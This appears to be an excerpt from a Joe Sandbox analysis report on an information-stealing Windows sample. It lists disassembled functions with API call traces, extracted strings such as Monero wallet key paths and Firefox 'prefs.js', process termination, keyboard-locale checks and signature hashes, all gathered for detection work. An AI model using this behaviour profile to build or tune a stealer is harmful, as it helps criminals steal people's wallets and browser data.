                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: 7a576056c5a608bcd481554e5b3839a5aaeea35c2f2cec78d585f988a929f2b6
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: F1E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                  Function 00E6F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E816B0,00E80D97), ref: 00E6F81E
                                  • StrCmpCA.SHLWAPI(?,00E816B4), ref: 00E6F86F
                                  • StrCmpCA.SHLWAPI(?,00E816B8), ref: 00E6F885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6FBB1
                                  • FindClose.KERNEL32(000000FF), ref: 00E6FBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 2c1dc7320d78e201f5aabebb2eca654fa285b328b22f74ba2ac203e487a31bc7
                                  • Instruction ID: 8ed6377bda69d2d5de0b0ee161410255f4dce081fb9ac7b94ae31fc45611706e
                                  • Opcode Fuzzy Hash: 2c1dc7320d78e201f5aabebb2eca654fa285b328b22f74ba2ac203e487a31bc7
                                  • Instruction Fuzzy Hash: 2DB12171A001189BDB24FF64DD96EED73B9AF94340F1495B8E40E67185EF30AB48CB92
                                  Function 00E61710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E8523C,?,?,?,00E852E4,?,?,00000000,?,00000000), ref: 00E61963
                                  • StrCmpCA.SHLWAPI(?,00E8538C), ref: 00E619B3
                                  • StrCmpCA.SHLWAPI(?,00E85434), ref: 00E619C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E61D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 00E61E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E61E60
                                  • FindClose.KERNEL32(000000FF), ref: 00E61E72
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 629a0663e201de8c1765e3e57dee2871ea9987baa36ed78d8aedabd84bbff0f2
                                  • Instruction ID: 80086b8ef0af824083e3f56f916dfaee048b75eda2e3d6b0afe1a5200d261cba
                                  • Opcode Fuzzy Hash: 629a0663e201de8c1765e3e57dee2871ea9987baa36ed78d8aedabd84bbff0f2
                                  • Instruction Fuzzy Hash: 4312C271950118ABDB19FB60DC66EEE73B9AF94300F5895F9A10E72091EF306B88CF51
                                  Function 00E6DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E80C32), ref: 00E6DF5E
                                  • StrCmpCA.SHLWAPI(?,00E815C0), ref: 00E6DFAE
                                  • StrCmpCA.SHLWAPI(?,00E815C4), ref: 00E6DFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6E4E0
                                  • FindClose.KERNEL32(000000FF), ref: 00E6E4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: 6e5d6eba76de82d52f3ea5774bdffd26a5f0ac8a723eba8fa9ffa9bf84cd4709
                                  • Instruction ID: 8dce3070629a8a30656359ab310c2492a59c356e299af37ff5612fecd9deaf49
                                  • Opcode Fuzzy Hash: 6e5d6eba76de82d52f3ea5774bdffd26a5f0ac8a723eba8fa9ffa9bf84cd4709
                                  • Instruction Fuzzy Hash: 52F1D0719141189ACB25FB60DCA5EEEB3B9AF94300F54A5F9A01E72091EF306F89CF51
                                  Function 00E6DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E815A8,00E80BAF), ref: 00E6DBEB
                                  • StrCmpCA.SHLWAPI(?,00E815AC), ref: 00E6DC33
                                  • StrCmpCA.SHLWAPI(?,00E815B0), ref: 00E6DC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6DECC
                                  • FindClose.KERNEL32(000000FF), ref: 00E6DEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 45fba452b1e67672c75e896437e9adb7d7d867b36e911855dfe77bdeafdd88f6
                                  • Instruction ID: 791812ff98120b822020f20f4dfb97872b6e6eedefb08bf1cf5a23b45375066d
                                  • Opcode Fuzzy Hash: 45fba452b1e67672c75e896437e9adb7d7d867b36e911855dfe77bdeafdd88f6
                                  • Instruction Fuzzy Hash: A1911172A001089BCB14FB70ED56DED73BDABD4340F4495B8F91BA6185EE349B48CB92
                                  Function 00E798E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E79905
                                  • Process32First.KERNEL32(00E69FDE,00000128), ref: 00E79919
                                  • Process32Next.KERNEL32(00E69FDE,00000128), ref: 00E7992E
                                  • StrCmpCA.SHLWAPI(?,00E69FDE), ref: 00E79943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7997A
                                  • CloseHandle.KERNEL32(00000000), ref: 00E79987
                                  • CloseHandle.KERNEL32(00E69FDE), ref: 00E79993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 506048ca94842b9f2be893abad0e77b5039c1af7268bac3496136901b3df9504
                                  • Instruction ID: be018d2c070c9ccd8aade80f0905c8e1a040a51f57f2fc36d455770b2b93fdba
                                  • Opcode Fuzzy Hash: 506048ca94842b9f2be893abad0e77b5039c1af7268bac3496136901b3df9504
                                  • Instruction Fuzzy Hash: D011F1B5900218EBDB24DFA4DC49BDDB7B9BF88705F00859CF619A6284DB749B84CF90
                                  Function 012B530E Relevance: 11.6, Strings: 8, Instructions: 1610COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2 w=$:$y$@5>$$@SNu$AQ,$cg|R$fsz$ph6
                                  • API String ID: 0-687166904
                                  • Opcode ID: abe3fe33d303703c1d939b52a6a0246e6729ce399f214607c2e382216c1912b6
                                  • Instruction ID: 77e3cd0bc0e21196af956badb14d2254e1a251591d101681ce207d862913e0fd
                                  • Opcode Fuzzy Hash: abe3fe33d303703c1d939b52a6a0246e6729ce399f214607c2e382216c1912b6
                                  • Instruction Fuzzy Hash: F2B2E6F390C2049FE304AE2DEC8576ABBE9EF94720F1A493DE6C4D3744EA3558058696
                                  Function 00E77D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00E805B7), ref: 00E77D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00E77D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E77D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E77DF2
                                  • LocalFree.KERNEL32(00000000), ref: 00E77EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 717d355a33354956ee8c19230ffb715ae977eb0ff424f8d0ffe6122384fef31b
                                  • Instruction ID: 9108546d005f553757b03dc9ffb63e49c9123fd094dcc144d40853899221ccf6
                                  • Opcode Fuzzy Hash: 717d355a33354956ee8c19230ffb715ae977eb0ff424f8d0ffe6122384fef31b
                                  • Instruction Fuzzy Hash: E8411B71940218ABDB24DB94DC99BEEB7B4FB44700F2091E9E10E76281DB746F84CF61
                                  Function 012B8995 Relevance: 10.4, Strings: 7, Instructions: 1629COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &xN$*({{$=~k$Mu$W@~~$YN?$gi{
                                  • API String ID: 0-3092782290
                                  • Opcode ID: 60773bd72df35b3292dd214d6151e6e06512c7d39a1fec98d19b7d5adbe9bbfe
                                  • Instruction ID: 6843678fcb3c70f135e678077b2467454afa8c64ffd5f61de3e4d1137b8d4e2f
                                  • Opcode Fuzzy Hash: 60773bd72df35b3292dd214d6151e6e06512c7d39a1fec98d19b7d5adbe9bbfe
                                  • Instruction Fuzzy Hash: AEB2F5F3A0C2049FE304AE2DEC8567AFBE9EF94720F16453DEAC487744EA3558058697
                                  Function 00E6E530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00E7AA50: lstrcpy.KERNEL32(00E80E1A,00000000), ref: 00E7AA98
                                    • Part of subcall function 00E7AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E7AC82
                                    • Part of subcall function 00E7AC30: lstrcat.KERNEL32(00000000), ref: 00E7AC92
                                    • Part of subcall function 00E7ACC0: lstrlen.KERNEL32(?,01738AF8,?,\Monero\wallet.keys,00E80E1A), ref: 00E7ACD5
                                    • Part of subcall function 00E7ACC0: lstrcpy.KERNEL32(00000000), ref: 00E7AD14
                                    • Part of subcall function 00E7ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E7AD22
                                    • Part of subcall function 00E7ABB0: lstrcpy.KERNEL32(?,00E80E1A), ref: 00E7AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00E80D79), ref: 00E6E5A2
                                  • StrCmpCA.SHLWAPI(?,00E815F0), ref: 00E6E5F2
                                  • StrCmpCA.SHLWAPI(?,00E815F4), ref: 00E6E608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00E6ECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmpDownload File
